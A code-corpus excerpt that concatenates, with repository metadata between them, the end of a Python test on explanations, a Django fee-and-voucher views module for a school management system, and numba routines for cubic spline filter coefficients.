trivial_explanations = [{frozendict(trivial_explanation) for trivial_explanation in find_trivial_explanations(event, epistemic_state)} for epistemic_state in epistemic_states]
expected_trivial_explanations = [
[{FF: True}],
[{FF: True}],
[{FF: True}, {L: True}],
[{FF: True}, {L: True}]
]
assert trivial_explanations == [{frozendict(expected_trivial_explanation) for expected_trivial_explanation in epistemic_state} for epistemic_state in expected_trivial_explanations]
nontrivial_explanations = [{frozendict(nontrivial_explanation) for nontrivial_explanation in find_nontrivial_explanations(event, epistemic_state)} for epistemic_state in epistemic_states]
expected_nontrivial_explanations = [
[{L: True}, {MD: True}],
[{L: True}, {MD: True}],
[{MD: True}],
[{MD: True}]
]
assert nontrivial_explanations == [{frozendict(expected_nontrivial_explanation) for expected_nontrivial_explanation in epistemic_state} for epistemic_state in expected_nontrivial_explanations]
| 56.157895 | 192 | 0.751172 | 576 | 4,268 | 5.307292 | 0.125 | 0.026169 | 0.042525 | 0.035983 | 0.436703 | 0.384037 | 0.266928 | 0.251881 | 0.242395 | 0.168466 | 0 | 0.014635 | 0.119494 | 4,268 | 75 | 193 | 56.906667 | 0.797765 | 0.061621 | 0 | 0.107692 | 0 | 0 | 0.00975 | 0.00675 | 0 | 0 | 0 | 0 | 0.123077 | 1 | 0 | false | 0 | 0.030769 | 0 | 0.030769 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
44d42b43218cec56ddb7aa37023d60517545e56a | 23,816 | py | Python | fee/views.py | masoodazhar/-school-management-system | 6525b3d29d12f03e05d362d81b7c5855806f57d9 | [
"Apache-2.0"
] | 1 | 2022-01-20T10:20:05.000Z | 2022-01-20T10:20:05.000Z | fee/views.py | masoodazhar/-school-management-system | 6525b3d29d12f03e05d362d81b7c5855806f57d9 | [
"Apache-2.0"
] | null | null | null | fee/views.py | masoodazhar/-school-management-system | 6525b3d29d12f03e05d362d81b7c5855806f57d9 | [
"Apache-2.0"
] | 1 | 2022-01-20T10:20:31.000Z | 2022-01-20T10:20:31.000Z | from django.shortcuts import render, redirect
from student.models import Admission
from .forms import SearchChallan
from django.utils import timezone
from django.db.models import Q
from .models import Voucher
from payroll.models import Salary
from django import forms
from django.contrib import messages
from django.urls import reverse_lazy
from django import forms
from django.db.models import Sum, Count
from django.http import HttpResponse, JsonResponse
import datetime
import json
from academic.models import Section, Classes
from num2words import num2words
# Create your views here.
from django.contrib.auth.mixins import PermissionRequiredMixin
from home.decorators import allowed_users
from django.contrib.auth.decorators import login_required
from payroll.models import Teacher
from home.views import SchoolProfile
from django.contrib.auth.models import User
# Fee section
class FeeDefSerchForm(forms.Form):
    """Search form for the fee-defaulter page: a single date text input.

    The field is pre-filled with today's date (evaluated once, at class
    definition / import time, exactly as before) and carries the
    ``date seacher_date`` CSS classes the template's datepicker hooks onto
    (field spelling kept to match the templates).
    """

    _date_widget = forms.TextInput(
        attrs={
            'class': 'date seacher_date',
            'value': timezone.now().strftime('%Y-%m-%d'),
        }
    )
    seacher_date = forms.CharField(widget=_date_widget)
class VoucherForm(forms.ModelForm):
    """ModelForm exposing every field of the Voucher model."""
    class Meta:
        model = Voucher
        fields = '__all__'
def convert_month(month_val):
    """Zero-pad a month number to two characters, e.g. 4 -> '04', 12 -> '12'.

    The previous implementation returned a string only for single-digit
    months and passed two-digit values through unchanged (still an ``int``
    when an int was given).  This version always returns a two-character
    string, matching the 'MM' month strings stored on Voucher records
    (they come from ``fee_month.split('-')[1]``).
    """
    return str(month_val).zfill(2)
def generate_voucher_number(number):
    """Return the next voucher serial number, zero-padded to nine digits.

    ``number`` is the current highest voucher id (an int or a numeric
    string); the result is ``number + 1`` left-padded with zeros, e.g.
    ``0`` -> ``'000000001'``.  Values that already exceed nine digits are
    returned un-padded, exactly as the previous if/elif ladder did.
    """
    return str(int(number) + 1).zfill(9)
@login_required
# @allowed_users('add_voucher')
def fee_main(request):
    """Fee dashboard.

    Aggregates, for the requesting user's module holder, the current
    month's and year's collected tuition fee, the month's and year's
    salary payout, and a month-by-month paid/unpaid series for the chart
    rendered by fee/main.html.
    """
    month = timezone.now().strftime("%m")
    current_month = timezone.now().strftime("%Y-%m-%d")
    year = timezone.now().strftime("%Y")
    # Staff accounts act as their own module holder; teachers inherit the
    # holder recorded on their Teacher profile.
    if request.user.is_staff:
        module_holder = request.user.username
    else:
        this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
        module_holder = this_holder.module_holder
    # GETTING MONTHLY FEE (sum of paid tuition for today's fee_month)
    current_month_total_fee = Voucher.objects.filter(
        month=month,
        fee_month=current_month,
        year=year,
        module_holder=module_holder
    ).aggregate(current_month_total_fee=Sum('monthly_tution_fee_paid'))
    # GETTING YEARLY FEE
    current_year_total_fee = Voucher.objects.filter(
        year=year,
        module_holder=module_holder
    ).aggregate(current_year_total_fee=Sum('monthly_tution_fee_paid'))
    # GETTING MONTHLY SALARY TOTAL (Salary_date stored as text, matched by
    # its 'YYYY-MM' prefix)
    current_month_total_salary = Salary.objects.filter(
        Q(Salary_date__startswith=timezone.now().strftime('%Y-%m'),
          module_holder=module_holder)
    ).aggregate(monthly_salary=Sum('salary'))
    # GETTING yearly SALARY TOTAL
    current_year_total_salary = Salary.objects.filter(
        Q(Salary_date__startswith=timezone.now().strftime('%Y'),
          module_holder=module_holder)
    ).aggregate(yearly_salary=Sum('salary'))
    print(current_month_total_salary,'====================================')
    # # GETTING UNPAID VOUCHER MONTHLY
    # current_unpaid_Vouchers_monthly = Voucher.objects.filter(
    #     month = month,
    #     year = year,
    #     monthly_tution_fee_paid=0,
    #     module_holder=module_holder
    # ).count()
    # # GETTING UNPAID VOUCHER YEARLY
    # current_unpaid_Vouchers_yearly = Voucher.objects.filter(
    #     year = year,
    #     monthly_tution_fee_paid=0,
    #     module_holder=module_holder
    # ).count()
    # Build one paid/unpaid aggregate per calendar month of the current
    # year.  NOTE: the loop variable deliberately shadows the `month`
    # string computed above, which is not used again.
    data_chart= []
    for month in range(1, 13):
        paid = Voucher.objects.filter(module_holder=module_holder, year=year, month=convert_month(month), monthly_tution_fee_paid__gt=1).aggregate(paid = Sum('monthly_tution_fee_paid'))
        unpaid = Voucher.objects.filter(module_holder=module_holder, year=year, month=convert_month(month), monthly_tution_fee_paid__lt=1).aggregate(unpaid = Sum('monthly_tution_fee') )
        data_chart.append({
            'paid': paid,
            'unpaid': unpaid,
            'date': year+'-'+str(convert_month(month))+'-'+'01'
        })
    # Flatten the aggregate dicts and replace None sums (months with no
    # matching vouchers) with 0 so the chart always gets numbers.
    final_chart=[]
    for data in data_chart:
        if data['paid']['paid'] is None:
            paid = 0
        else:
            paid = data['paid']['paid']
        if data['unpaid']['unpaid'] is None:
            unpaid = 0
        else:
            unpaid = data['unpaid']['unpaid']
        final_chart.append({
            'paid_amount': paid,
            'un_paid_amount': unpaid,
            'date': data['date'],
        })
    print(final_chart)
    # JSON copy of the chart series for the template's JavaScript.
    ddddd = json.dumps(final_chart)
    context = {
        'data_chart': final_chart,
        'ddddd': ddddd,
        'current_year_total_salary':current_year_total_salary,
        'current_month_total_salary': current_month_total_salary,
        'current_month_total_fee': current_month_total_fee,
        'current_year_total_fee': current_year_total_fee,
        # 'current_unpaid_Vouchers_monthly': current_unpaid_Vouchers_monthly,
        # 'current_unpaid_Vouchers_yearly': current_unpaid_Vouchers_yearly,
        'current_month': timezone.now().strftime('%B, %Y'),
        'current_month_redirect': timezone.now().strftime('%Y-%m-%d'),
        'current_year': timezone.now().strftime('%Y'),
        # NOTE(review): duplicate dict key — harmlessly repeats the entry above.
        'current_month_total_fee': current_month_total_fee
    }
    return render(request,'fee/main.html', context)
@login_required
@allowed_users('view_voucher')
def fee_received(request, date):
    """List paid vouchers for a month ('YYYY-MM-DD') or a whole year ('YYYY').

    A ``date`` longer than four characters is treated as a full fee-month
    date and narrows the query to that month; a bare year string matches
    every paid voucher of the year for the current module holder.
    """
    if request.user.is_staff:
        holder = request.user.username
    else:
        holder = Teacher.objects.get(user_ptr_id=request.user.id).module_holder
    paid_vouchers = Voucher.objects.filter(
        module_holder=holder, monthly_tution_fee_paid__gt=1
    )
    if len(date) > 4:
        year_part, month_part = date.split('-')[0], date.split('-')[1]
        searched_data_month = paid_vouchers.filter(
            month=month_part, fee_month=date, year=year_part
        )
    else:
        searched_data_month = paid_vouchers.filter(year=date)
    context = {
        'searched_data_month': searched_data_month
    }
    return render(request, 'fee/fee_received.html', context)
@login_required
# @allowed_users('view_voucher')
def GenerateChallan(request):
    """Create (or refresh) one fee voucher per student of the selected
    class/section for the chosen fee month, then list them for printing.

    On POST with a valid search form: existing vouchers for the month get
    their issue/due dates updated; missing ones are created with a
    sequential challan number and a fee pro-rated for mid-month admissions.
    (Block indentation was reconstructed from a flattened source — confirm
    against the original file.)
    """
    all_vouchers = []
    if request.user.is_staff:
        module_holder = request.user.username
    else:
        this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
        module_holder = this_holder.module_holder
    if request.method=='POST':
        search_form = SearchChallan(module_holder, request.POST, initial={'year':timezone.now().strftime('%Y')})
        if search_form.is_valid():
            class_id = request.POST.get('classes')
            section_id = request.POST.get('admission_section')
            # issue_date = request.POST.get('issue_date'),
            # due_date = request.POST.get('due_date'),
            # fee_month = request.POST.get('fee_month'),
            # NOTE: the trailing comma makes `year` a 1-tuple; the next
            # line unpacks it back to the bare 'YYYY' string.
            year = request.POST.get('fee_month').split('-')[0],
            year = year[0]
            all_std = Admission.objects.filter(module_holder=module_holder, admission_class=class_id, admission_section=section_id)
            # print('===================\n', request.POST)
            for data in all_std:
                # A voucher already issued for this student/month is only
                # refreshed with the new issue/due dates.
                search_voucher_data = Voucher.objects.filter(
                    student_name=Admission.objects.get(pk=data.pk),
                    father_name=data.father_name,
                    month=request.POST.get('fee_month').split('-')[1],
                    year=year,
                    module_holder=module_holder
                )
                if search_voucher_data.exists():
                    search_voucher_data.update(issue_date=request.POST.get('issue_date'),due_date=request.POST.get('due_date'))
                    messages.success(request, 'Data has been updated & ready to print')
                else:
                    messages.success(request, 'Data has been Saved & ready to print')
                    # Next challan number is derived from the highest id.
                    if Voucher.objects.count()>0:
                        challan_number = Voucher.objects.values('id').latest('id')['id']
                    else:
                        challan_number ='0'
                    #COLCULATING FEE WITH ADMISSION DATE
                    monthly_tution_fee_divided_in_days = 0
                    admission_date = str(data.admission_date).split('-')
                    admission_year = int(admission_date[0])
                    admission_month = int(admission_date[1])
                    admission_day = int(admission_date[2])
                    challan_year = int(request.POST.get('fee_month').split('-')[0])
                    challan_month = int(request.POST.get('fee_month').split('-')[1])
                    # Students admitted in the challan month are charged
                    # pro rata on a 30-day month.
                    if(admission_year==challan_year and admission_month==challan_month):
                        monthly_tut_fee = data.monthly_tution_fee
                        per_day_fee = monthly_tut_fee/30
                        days_of_fee = 30-admission_day
                        monthly_tution_fee_divided_in_days = per_day_fee*days_of_fee
                    else:
                        monthly_tution_fee_divided_in_days = data.monthly_tution_fee
                    # NOTE(review): this month-by-month comparison misfires
                    # across year boundaries (e.g. admitted Dec 2020,
                    # challan Jan 2021 fails the month<= test) — confirm.
                    if(admission_year<=challan_year and admission_month<=challan_month):
                        save_voucher = Voucher(
                            reg_number= data.admission_registration,
                            student_name=Admission.objects.get(pk=data.pk),
                            father_name=data.father_name,
                            issue_date=request.POST.get('issue_date'),
                            due_date=request.POST.get('due_date'),
                            fee_month=request.POST.get('fee_month'),
                            month= request.POST.get('fee_month').split('-')[1] ,
                            year=year,
                            challan_number=generate_voucher_number(challan_number),
                            monthly_tution_fee= monthly_tution_fee_divided_in_days,
                            section=data.admission_section,
                            class_name= data.admission_class,
                            module_holder = module_holder
                        ).save()
                # Collect this student's voucher(s) for the print-out list.
                all_vouchers_single = Voucher.objects.filter(
                    student_name=Admission.objects.get(pk=data.pk),
                    father_name=data.father_name,
                    month=request.POST.get('fee_month').split('-')[1],
                    year=year,
                )
                all_vouchers.append({'voucher':all_vouchers_single})
    else:
        search_form = SearchChallan(module_holder ,initial={'year':timezone.now().strftime('%Y')})
    context = {
        'search_form': search_form,
        'all_student': all_vouchers,
        'current_month': timezone.now().strftime('%B, %Y'),
        'current_year': timezone.now().strftime('%Y')
    }
    return render(request, 'fee/generate_challan.html', context)
@login_required
# @allowed_users('view_voucher')
def generated_challan(request):
    """Render the printable challan sheet for the rows posted from the
    generate-challan page.

    The page posts parallel lists (reg_number, name_of_student, ...) plus a
    ``pk`` list of row indices.  Each selected row is turned into a plain
    dict and duplicated twice — once as the parent's copy and once as the
    school copy — so the template prints both halves of the challan.
    """
    if request.user.is_staff:
        module_holder = request.user.username
    else:
        this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
        module_holder = this_holder.module_holder
    murge_data = []
    if request.method=='POST':
        print(request.POST)
        for datas in request.POST.getlist('pk'):
            # Posted 'pk' values are row indices into the parallel lists.
            row = int(datas)
            data = {
                'reg_number': request.POST.getlist('reg_number')[row],
                'student_name': request.POST.getlist('name_of_student')[row],
                'father_name': request.POST.getlist('father_name')[row],
                'issue_date': request.POST.get('issue_date'),
                'due_date': request.POST.get('due_date'),
                'fee_month': request.POST.get('fee_month'),
                'year': request.POST.get('year'),
                'challan_number': request.POST.getlist('challan_number')[row],
                'monthly_tution_fee': request.POST.getlist('monthly_tution_fee')[row],
                'section': request.POST.getlist('admission_section')[row],
                'class_name': request.POST.getlist('admission_class')[row],
                'monthly_tution_fee_in_word': num2words(request.POST.getlist('monthly_tution_fee')[row])
            }
            # Two print copies per voucher.  (The old code used
            # ``if ps is 0:`` — an identity test against an int literal,
            # which only works by CPython small-int caching; fixed here.)
            for copy in ("Parent's Copy", "School Copy"):
                murge_data.append({
                    'copy': copy,
                    'data': data
                })
    user = User.objects.get(username=module_holder)
    school_profile = SchoolProfile.objects.filter(username=user.pk).first()
    context = {
        'school_profile': school_profile,
        'murge_data': murge_data,
        'current_month': timezone.now().strftime('%B, %Y'),
        'current_year': timezone.now().strftime('%Y')
    }
    return render(request, 'fee/generated_challan.html', context)
@login_required
@allowed_users('view_voucher')
def UnpaidChallan(request):
    """List the vouchers of the class/section/month chosen in the search
    form, annotating each row with its paid amount (0 when unpaid)."""
    if request.user.is_staff:
        module_holder = request.user.username
    else:
        this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
        module_holder = this_holder.module_holder
    all_vouchers = []
    if request.method=='POST':
        search_form = SearchChallan(module_holder, request.POST, initial={'year':timezone.now().strftime('%Y')})
        if search_form.is_valid():
            # print(request.POST,'========form is valid')
            search_voucher_data = Voucher.objects.filter(
                class_name=Classes.objects.get(pk=request.POST.get('classes')),
                section = Section.objects.get(pk=request.POST.get('admission_section')),
                # issue_date = request.POST.get('issue_date'),
                # due_date = request.POST.get('due_date'),
                # fee_month = request.POST.get('fee_month'),
                month=request.POST.get('fee_month').split('-')[1],
                year=request.POST.get('year'),
                module_holder = module_holder
            )
            # Flatten each voucher to a template-friendly dict; `status`
            # carries the paid amount, or 0 for unpaid rows.
            status = 0
            for data in search_voucher_data:
                if data.monthly_tution_fee_paid>0:
                    status = data.monthly_tution_fee_paid
                else:
                    status = 0
                all_vouchers.append({
                    'pk':data.pk,
                    'challan_number':data.challan_number,
                    'reg_number':data.reg_number ,
                    'monthly_tution_fee':data.monthly_tution_fee ,
                    'status':status,
                    'student_name':data.student_name ,
                    'father_name':data.father_name,
                    'section':data.section ,
                    'class_name':data.class_name ,
                })
            if len(all_vouchers)>0:
                print("not empty")
            else:
                messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate ")
    else:
        search_form = SearchChallan(module_holder, initial={'year':timezone.now().strftime('%Y')})
    context = {
        'search_form': search_form,
        'all_student': all_vouchers,
        'current_month': timezone.now().strftime('%B, %Y'),
        'current_year': timezone.now().strftime('%Y')
    }
    return render(request, 'fee/unpaid_challan.html', context)
@login_required
@allowed_users('view_voucher')
def payChallan(request):
    """Record fee payments for the vouchers posted from the unpaid-challan
    page, then re-list the class/section/month with updated paid status.

    Each posted ``pk`` value is a ``'<voucher_pk>-<row_index>'`` pair: the
    pk selects the voucher to update and the index picks the amount from
    the parallel ``monthly_tution_fee`` list.  Renders the same template
    as UnpaidChallan.
    """
    if request.user.is_staff:
        module_holder = request.user.username
    else:
        this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
        module_holder = this_holder.module_holder
    all_vouchers = []
    if request.method=='POST':
        search_form = SearchChallan(module_holder, request.POST, initial={'year':timezone.now().strftime('%Y')})
        if search_form.is_valid():
            # print(request.POST, 'this is valid=============')
            for pk_index in request.POST.getlist('pk'):
                pk = pk_index.split('-')[0]
                index = pk_index.split('-')[1]
                get_voucher_data = Voucher.objects.filter(pk=pk).update(
                    monthly_tution_fee_paid=request.POST.getlist('monthly_tution_fee')[int(index)]
                )
            # Re-query so the listing reflects the payments just recorded.
            search_voucher_data = Voucher.objects.filter(
                class_name=request.POST.get('classes'),
                section =request.POST.get('admission_section'),
                # issue_date = request.POST.get('issue_date'),
                # due_date = request.POST.get('due_date'),
                month=request.POST.get('fee_month').split('-')[1],
                year=request.POST.get('year'),
                module_holder = module_holder
            )
            status = 0
            for data in search_voucher_data:
                if data.monthly_tution_fee_paid>0:
                    status = data.monthly_tution_fee_paid
                else:
                    status = 0
                all_vouchers.append({
                    'pk':data.pk,
                    'challan_number':data.challan_number,
                    'reg_number':data.reg_number ,
                    'monthly_tution_fee':data.monthly_tution_fee ,
                    'status':status,
                    'student_name':data.student_name ,
                    'father_name':data.father_name,
                    'section':data.section ,
                    'class_name':data.class_name
                })
            if len(all_vouchers)>0:
                print("not empty")
            else:
                messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate Challan ")
    else:
        search_form = SearchChallan(module_holder, initial={'year':timezone.now().strftime('%Y')})
    context = {
        'search_form': search_form,
        'all_student': all_vouchers,
        'now': timezone.now().strftime('%m/%d/%Y')
    }
    return render(request, 'fee/unpaid_challan.html', context)
@login_required
@allowed_users('view_voucher')
def fee_defaulter(request):
    """List unpaid vouchers ("defaulters") for a month.

    GET shows the current month's unpaid vouchers; POST re-queries for the
    month of the submitted ``seacher_date`` and, when rows are posted back,
    records the payments from the parallel ``pk`` / ``monthly_tution_fee``
    lists.
    """
    if request.user.is_staff:
        module_holder = request.user.username
    else:
        this_holder = Teacher.objects.get(user_ptr_id=request.user.id)
        module_holder = this_holder.module_holder
    all_vouchers = []
    date = timezone.now().strftime('%Y-%m-%d')
    if request.method=='GET':
        # Default view: this month's unpaid vouchers.
        search_voucher_data = Voucher.objects.filter(
            Q(monthly_tution_fee_paid__lt=1,
              month=date.split('-')[1],
              year=date.split('-')[0],
              module_holder = module_holder)
        )
    if request.method=='POST':
        Feedefserchform = FeeDefSerchForm(request.POST)
        search_voucher_data = Voucher.objects.filter(
            Q(monthly_tution_fee_paid__lt=1,
              month=request.POST.get('seacher_date').split('-')[1],
              year=request.POST.get('seacher_date').split('-')[0],
              module_holder = module_holder)
        )
        if search_voucher_data:
            print(search_voucher_data, 'this is valid=============')
            # Apply any payments posted back with the row selection.
            index = 0
            for pk_id in request.POST.getlist('pk'):
                get_voucher_data = Voucher.objects.filter(pk=pk_id).update(
                    monthly_tution_fee_paid=request.POST.getlist('monthly_tution_fee')[index]
                )
                index = index+1
            # NOTE(review): this warning fires unconditionally after a
            # successful update — the message text looks wrong; confirm.
            messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate ")
        else:
            messages.warning(request," There is no fee defaulter in this month ")
    else:
        Feedefserchform = FeeDefSerchForm()
    # Flatten the queryset for the template; `status` is the paid amount
    # (0 for unpaid rows).
    status = 0
    for data in search_voucher_data:
        if data.monthly_tution_fee_paid>0:
            status = data.monthly_tution_fee_paid
        else:
            status = 0
        all_vouchers.append({
            'pk':data.pk,
            'challan_number':data.challan_number,
            'reg_number':data.reg_number ,
            'monthly_tution_fee':data.monthly_tution_fee ,
            'status':status,
            'student_name':data.student_name ,
            'father_name':data.father_name,
            'section':data.section ,
            'class_name':data.class_name ,
        })
    if len(search_voucher_data)>0:
        print("not empty")
    else:
        messages.warning(request," There is no any Challan Generated based on your searched data. Please Generate ")
    context = {
        'all_student': all_vouchers,
        'Feedefserchform': Feedefserchform,
        'current_month': timezone.now().strftime('%B, %Y'),
        'current_year': timezone.now().strftime('%Y')
    }
    return render(request,'fee/fee_defaulter.html', context)
44d4708d8f3e8cbb68ded6ad9426b4bdf6c6ba43 | 6,211 | py | Python | interpolation/splines/filter_cubic.py | gboehl/interpolation.py | 25520556804dd104c5931c8a6bedfff65420025f | [
"BSD-2-Clause"
] | null | null | null | interpolation/splines/filter_cubic.py | gboehl/interpolation.py | 25520556804dd104c5931c8a6bedfff65420025f | [
"BSD-2-Clause"
] | null | null | null | interpolation/splines/filter_cubic.py | gboehl/interpolation.py | 25520556804dd104c5931c8a6bedfff65420025f | [
"BSD-2-Clause"
] | null | null | null | from __future__ import division
import numpy as np
import time
from numba import jit, njit
# used by njitted routines (frozen)
basis = np.array([1.0 / 6.0, 2.0 / 3.0, 1.0 / 6.0, 0.0])
@njit(cache=True)
def solve_deriv_interp_1d(bands, coefs):
    """Solve the banded interpolation system in place.

    ``bands`` has one row per equation with columns
    ``[sub-diagonal, diagonal, super-diagonal, right-hand side]``; the
    first and last rows are the boundary equations set up by the caller
    (see find_coefs_1d).  Forward elimination runs top-down, normalising
    each pivot to 1, then the M + 2 coefficients are recovered into
    ``coefs`` by back substitution.  Both arrays are mutated.
    """
    M = coefs.shape[0] - 2
    # Solve interpolating equations
    # First and last rows are different
    # Normalise row 0 by its pivot.
    bands[0, 1] /= bands[0, 0]
    bands[0, 2] /= bands[0, 0]
    bands[0, 3] /= bands[0, 0]
    bands[0, 0] = 1.0
    # Eliminate row 1's sub-diagonal against row 0, then normalise.
    bands[1, 1] -= bands[1, 0] * bands[0, 1]
    bands[1, 2] -= bands[1, 0] * bands[0, 2]
    bands[1, 3] -= bands[1, 0] * bands[0, 3]
    bands[0, 0] = 0.0
    bands[1, 2] /= bands[1, 1]
    bands[1, 3] /= bands[1, 1]
    bands[1, 1] = 1.0
    # Now do rows 2 through M+1
    for row in range(2, M + 1):
        bands[row, 1] -= bands[row, 0] * bands[row - 1, 2]
        bands[row, 3] -= bands[row, 0] * bands[row - 1, 3]
        bands[row, 2] /= bands[row, 1]
        bands[row, 3] /= bands[row, 1]
        bands[row, 0] = 0.0
        bands[row, 1] = 1.0
    # Do last row (eliminates against rows M-1 and M — the boundary row
    # couples to two interior rows).
    bands[M + 1, 1] -= bands[M + 1, 0] * bands[M - 1, 2]
    bands[M + 1, 3] -= bands[M + 1, 0] * bands[M - 1, 3]
    bands[M + 1, 2] -= bands[M + 1, 1] * bands[M, 2]
    bands[M + 1, 3] -= bands[M + 1, 1] * bands[M, 3]
    bands[M + 1, 3] /= bands[M + 1, 2]
    bands[M + 1, 2] = 1.0
    coefs[M + 1] = bands[(M + 1), 3]
    # Now back substitute up
    for row in range(M, 0, -1):
        coefs[row] = bands[row, 3] - bands[row, 2] * coefs[row + 1]
    # Finish with first row
    coefs[0] = bands[0, 3] - bands[0, 1] * coefs[1] - bands[0, 2] * coefs[2]
@njit(cache=True)
def find_coefs_1d(delta_inv, M, data, coefs):
    """Build and solve the 1-d spline interpolation system for ``data``.

    Interior equations use the module-level ``basis`` weights
    (1/6, 2/3, 1/6) with the data values as right-hand sides; the two
    boundary rows impose a (1, -2, 1) * delta_inv**2 second-difference
    condition with zero right-hand side.  The M + 2 coefficients are
    written into ``coefs`` by solve_deriv_interp_1d.
    """
    bands = np.zeros((M + 2, 4))
    # Setup boundary conditions
    abcd_left = np.zeros(4)
    abcd_right = np.zeros(4)
    # Left boundary
    abcd_left[0] = 1.0 * delta_inv * delta_inv
    abcd_left[1] = -2.0 * delta_inv * delta_inv
    abcd_left[2] = 1.0 * delta_inv * delta_inv
    abcd_left[3] = 0
    # Right boundary
    abcd_right[0] = 1.0 * delta_inv * delta_inv
    abcd_right[1] = -2.0 * delta_inv * delta_inv
    abcd_right[2] = 1.0 * delta_inv * delta_inv
    abcd_right[3] = 0
    for i in range(4):
        bands[0, i] = abcd_left[i]
        bands[M + 1, i] = abcd_right[i]
    # Interior rows: B-spline basis weights, data as right-hand side.
    for i in range(M):
        for j in range(3):
            bands[i + 1, j] = basis[j]
        bands[i + 1, 3] = data[i]
    solve_deriv_interp_1d(bands, coefs)
@njit(cache=True)
def filter_coeffs_1d(dinv, data):
    """Return 1-d spline filter coefficients for ``data``.

    The coefficient array has two extra entries — one boundary knot on
    each side of the data.
    """
    n_data = data.shape[0]
    out = np.zeros(n_data + 2)
    find_coefs_1d(dinv[0], n_data, data, out)
    return out
@njit(cache=True)
def filter_coeffs_2d(dinv, data):
    """Return 2-d spline filter coefficients via two 1-d sweeps.

    Every column of the raw data is filtered along x first, then every row
    of the padded coefficient array is filtered along y.
    """
    n_x = data.shape[0]
    n_y = data.shape[1]
    out = np.zeros((n_x + 2, n_y + 2))
    # x-direction: one solve per raw-data column
    for j in range(n_y):
        find_coefs_1d(dinv[0], n_x, data[:, j], out[:, j])
    # y-direction: one solve per padded coefficient row
    for i in range(n_x + 2):
        find_coefs_1d(dinv[1], n_y, out[i, :], out[i, :])
    return out
@njit(cache=True)
def filter_coeffs_3d(dinv, data):
    """Return 3-d spline filter coefficients via three successive 1-d sweeps."""
    n_x = data.shape[0]
    n_y = data.shape[1]
    n_z = data.shape[2]
    out = np.zeros((n_x + 2, n_y + 2, n_z + 2))
    # x-direction over the raw data
    for j in range(n_y):
        for k in range(n_z):
            find_coefs_1d(dinv[0], n_x, data[:, j, k], out[:, j, k])
    # y-direction over every padded x row (raw z index)
    for i in range(n_x + 2):
        for k in range(n_z):
            find_coefs_1d(dinv[1], n_y, out[i, :, k], out[i, :, k])
    # z-direction over every padded (x, y) pair
    for i in range(n_x + 2):
        for j in range(n_y + 2):
            find_coefs_1d(dinv[2], n_z, out[i, j, :], out[i, j, :])
    return out
@njit(cache=True)
def filter_coeffs_4d(dinv, data):
    """Return 4-d spline filter coefficients via four successive 1-d sweeps.

    Each pass filters one axis; earlier axes are iterated over their
    padded (size + 2) extent once filtered, later axes over the raw size.
    """
    n0 = data.shape[0]
    n1 = data.shape[1]
    n2 = data.shape[2]
    n3 = data.shape[3]
    out = np.zeros((n0 + 2, n1 + 2, n2 + 2, n3 + 2))
    # axis 0 over the raw data
    for j in range(n1):
        for k in range(n2):
            for l in range(n3):
                find_coefs_1d(dinv[0], n0, data[:, j, k, l], out[:, j, k, l])
    # axis 1
    for i in range(n0 + 2):
        for k in range(n2):
            for l in range(n3):
                find_coefs_1d(dinv[1], n1, out[i, :, k, l], out[i, :, k, l])
    # axis 2
    for i in range(n0 + 2):
        for j in range(n1 + 2):
            for l in range(n3):
                find_coefs_1d(dinv[2], n2, out[i, j, :, l], out[i, j, :, l])
    # axis 3
    for i in range(n0 + 2):
        for j in range(n1 + 2):
            for k in range(n2 + 2):
                find_coefs_1d(dinv[3], n3, out[i, j, k, :], out[i, j, k, :])
    return out
def filter_coeffs(smin, smax, orders, data):
    """Filter ``data`` on the regular grid [smin, smax] x ``orders``.

    ``data`` may be flat; it is reshaped to ``orders`` before the
    dimension-specific filter is dispatched via filter_data.
    """
    lo = np.array(smin, dtype=float)
    hi = np.array(smax, dtype=float)
    dinv = (hi - lo) / orders
    return filter_data(dinv, data.reshape(orders))
def filter_mcoeffs(smin, smax, orders, data):
    """Filter several stacked splines at once.

    The last axis of ``data`` indexes the individual splines; each slice
    is filtered independently with filter_coeffs and the padded
    coefficient arrays are stacked along a trailing axis of the result.
    (An unused local ``order = len(smin)`` was removed.)
    """
    n_splines = data.shape[-1]
    coefs = np.zeros(tuple(i + 2 for i in orders) + (n_splines,))
    for i in range(n_splines):
        coefs[..., i] = filter_coeffs(smin, smax, orders, data[..., i])
    return coefs
def filter_data(dinv, data):
    """Dispatch to the dimension-specific spline filtering routine.

    Parameters
    ----------
    dinv : sequence of float
        Inverse grid steps, one per dimension (1 to 4 supported).
    data : ndarray
        Grid values with ``len(dinv)`` dimensions.

    Raises
    ------
    ValueError
        For more than four dimensions (previously the function silently
        returned ``None`` in that case).
    """
    n_dims = len(dinv)
    if n_dims == 1:
        return filter_coeffs_1d(dinv, data)
    if n_dims == 2:
        return filter_coeffs_2d(dinv, data)
    if n_dims == 3:
        return filter_coeffs_3d(dinv, data)
    if n_dims == 4:
        return filter_coeffs_4d(dinv, data)
    raise ValueError("filter_data supports only 1 to 4 dimensions")
#
if __name__ == "__main__":
    # Ad-hoc benchmark: time the 3-d filter on a small and a large cube.
    # The first call also pays the numba JIT compilation cost.
    import numpy
    dinv = numpy.ones(3, dtype=float)*0.5
    coeffs_0 = numpy.random.random([10,10,10])
    coeffs_1 = numpy.random.random([100,100,100])
    print(coeffs_0[:2,:2,:2])
    import time
    t1 = time.time()
    filter_coeffs_3d(dinv, coeffs_0)
    t2 = time.time()
    filter_coeffs_3d(dinv, coeffs_1)
    t3 = time.time()
    print('Elapsed : {}'.format(t2-t1))
    print('Elapsed : {}'.format(t3-t2))
